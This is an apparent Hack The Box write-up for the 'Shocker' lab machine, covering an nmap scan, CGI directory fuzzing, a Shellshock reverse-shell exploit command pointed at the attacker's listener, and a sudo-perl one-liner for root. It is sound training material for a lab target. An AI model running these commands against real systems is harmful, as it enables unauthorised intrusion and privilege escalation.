Hack The Box - Shocker Writeup


Nmap

nmap -sC -sV -oA nmap -v 10.10.10.56

Output

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:04 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:04
Completed Parallel DNS resolution of 1 host. at 16:04, 0.01s elapsed
Initiating Connect Scan at 16:04
Scanning 10.10.10.56 [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed Connect Scan at 16:04, 0.42s elapsed (1000 total ports)
Initiating Service scan at 16:04
Scanning 2 services on 10.10.10.56
Completed Service scan at 16:04, 6.05s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.56.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.89s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.11s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Nmap scan report for 10.10.10.56
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

From our scan we have see we have the below services available.

Port Service
80 HTTP
2222 SSH

HTTP

First taking a look at the HTTP server we find a basic page. The source of the page doesn’t reveal anything.

Dirbuster

Using dirbuster with a standard wordlist we find a cgi-bin folder. Given the name of the box is shocker we can assume the attack is a Shellshock attack.

Using dirbuster again we can fuzz for sh, cgi and pl files.

After a few seconds we find a user.sh file.

Shellshock Exploit

The exploit for this box is the well known Apache mod_cgi - 'Shellshock' Remote Command Injection exploit.

The syntax for executing the PoC is python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.16 lport=4555 pages=/cgi-bin/user.sh

  • payload Can be either a reverse or bind shell
  • rhost The IP/hostname of the server
  • lhost The IP of our system
  • lport The port where the shell will establish connection
  • pages The URL to the sh file

Executing this will immediately grant us shell access as the user shelly and the user.txt file can be found at /home/shelly/user.txt

Privilege Escalation

Now that we have shell as a user our task is to escalate our privileges to root. By running sudo -l we find that we have permissions to run sudo /usr/bin/perl as root with no password.

This can easily be exploited as perl can execute other programs. By running sudo /usr/bin/perl -e 'exec "/bin/bash";' we now have a bash session as root and can find the root.txt file in /root/root.txt